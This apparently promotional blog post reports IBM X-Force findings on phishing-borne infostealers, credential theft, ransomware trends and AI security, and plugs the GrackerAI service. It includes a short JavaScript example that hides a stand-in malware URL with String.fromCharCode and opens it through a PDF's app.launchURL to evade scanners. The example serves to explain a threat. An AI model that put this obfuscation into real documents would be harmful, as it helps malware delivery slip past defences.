Phishing Emails Delivering Infostealers Surge 84%
Cybersecurity researchers have documented an alarming surge in infostealer malware distribution through phishing channels, with weekly delivery volume increasing by 84% in 2024 compared to the previous year. This upward trend shows no signs of slowing, with early 2025 figures suggesting an even more dramatic 180% increase in weekly volume compared to 2023 baselines. The evolution of delivery mechanisms has played a crucial role in this proliferation of threats, as traditional malicious attachments have declined significantly.
Image courtesy of Help Net Security
Infostealers represent a particularly insidious class of malicious software designed to extract valuable information from compromised systems. These programs operate silently, capturing screenshots and logging keystrokes, and most critically, harvesting stored credentials from browsers, cryptocurrency wallets, and password managers. Once exfiltrated, these credentials fuel subsequent attacks, with valid account compromise now tied with exploitation of public-facing applications as the top initial access vector in 30% of security incidents.
IBM analysts identified AgentTesla as the most prevalent infostealer distributed via phishing emails, followed by FormBook, SnakeKeylogger, and PureLogs Stealer. Dark web marketplace analysis revealed a 12% year-over-year increase in infostealer listings, indicating a thriving criminal ecosystem that demonstrates the profitability and sustainability of credential harvesting operations.
“Credential harvesting was observed in 28% of all security incidents we responded to in 2024,” noted Charles Henderson, Head of IBM X-Force. “Often, these stolen credentials allow attackers to remain undetected for extended periods as they move laterally through environments, making detection and remediation exceedingly difficult.”
PDF Obfuscation Techniques: The Hidden Danger
The shift toward PDF-based delivery mechanisms represents one of the most sophisticated evolutions in the infostealer landscape. Threat actors have embraced PDF files because they are universally trusted document formats that can effectively conceal malicious code. Analysis of malicious PDFs reveals that 42% used obfuscated URLs, 28% hid their URLs in PDF streams, and 7% were delivered in encrypted form with an accompanying password.
The technical sophistication of these obfuscation techniques often involves encoding malicious URLs using methods like hexadecimal representation or JavaScript obfuscation. For instance, a typical obfuscated URL might be encoded as:
var url = String.fromCharCode(104,116,116,112,115,58,47,47,109,97,108,119,97,114,101,46,115,105,116,101);
app.launchURL(url);
This code translates to “https://malware.Site” when executed but appears harmless to automated scanning systems. Organizations need to implement layered defenses that extend beyond traditional email scanning solutions to combat these sophisticated threats.
.webp)
Image courtesy of IBM
Identity Attacks Comprise a Third of Intrusions
Threat actors ramped up credential theft over the past year, using AI-generated phishing emails and infostealer malware to improve their results. According to IBM, around 30% of intrusions last year were identity-based attacks, fueled by an 84% annual increase in the volume of emails delivering infostealers. Businesses need to shift away from ad-hoc prevention and focus on proactive measures such as modernizing authentication management and conducting real-time threat hunting.
“Cybercriminals are most often breaking in without breaking anything – capitalizing on identity gaps overflowing from complex hybrid cloud environments that offer attackers multiple access points,” said Mark Hughes, Global Managing Partner of Cybersecurity Services at IBM. This points to the critical need for organizations to enhance their cybersecurity measures, including multi-factor authentication and robust identity management systems.
Downtrend in Ransomware Incidents
Ransomware made up 28% of malware incident response cases and 11% of security cases, representing a decline over the last several years. This trend reflects an evolution in defensive tactics, such as increased collaboration with law enforcement to take down the infrastructure of prominent botnets linked to ransomware attacks. As a result of these takedowns, there has been increased diversification in the malware activity of cybercrime groups.
For organizations looking to enhance their security posture, understanding these shifting dynamics is crucial. Employing GrackerAI can help companies monitor emerging threats and produce relevant content that resonates with cybersecurity professionals and decision-makers. By automating insight generation from industry developments, GrackerAI positions itself as a solution for creating timely, targeted marketing materials.
Image courtesy of PR Newswire
AI Security Holds Steady
While large-scale attacks on AI technologies did not materialize in 2024, security researchers are racing to identify and fix vulnerabilities before cybercriminals exploit them. Issues like remote code execution vulnerabilities in frameworks for building AI agents are becoming more frequent. As AI adoption grows, so will the incentives for adversaries to develop specialized attack toolkits targeting AI.
The APAC region experienced the most attacks in 2024, accounting for 34% of all incidents investigated. Attackers frequently employed malware-ransomware and server access as their primary actions. For businesses looking to stay ahead of the curve, leveraging AI-powered solutions such as GrackerAI can enhance marketing strategies and content generation while addressing evolving cybersecurity threats and trends.
Explore our services or contact GrackerAI to transform security news into strategic content opportunities.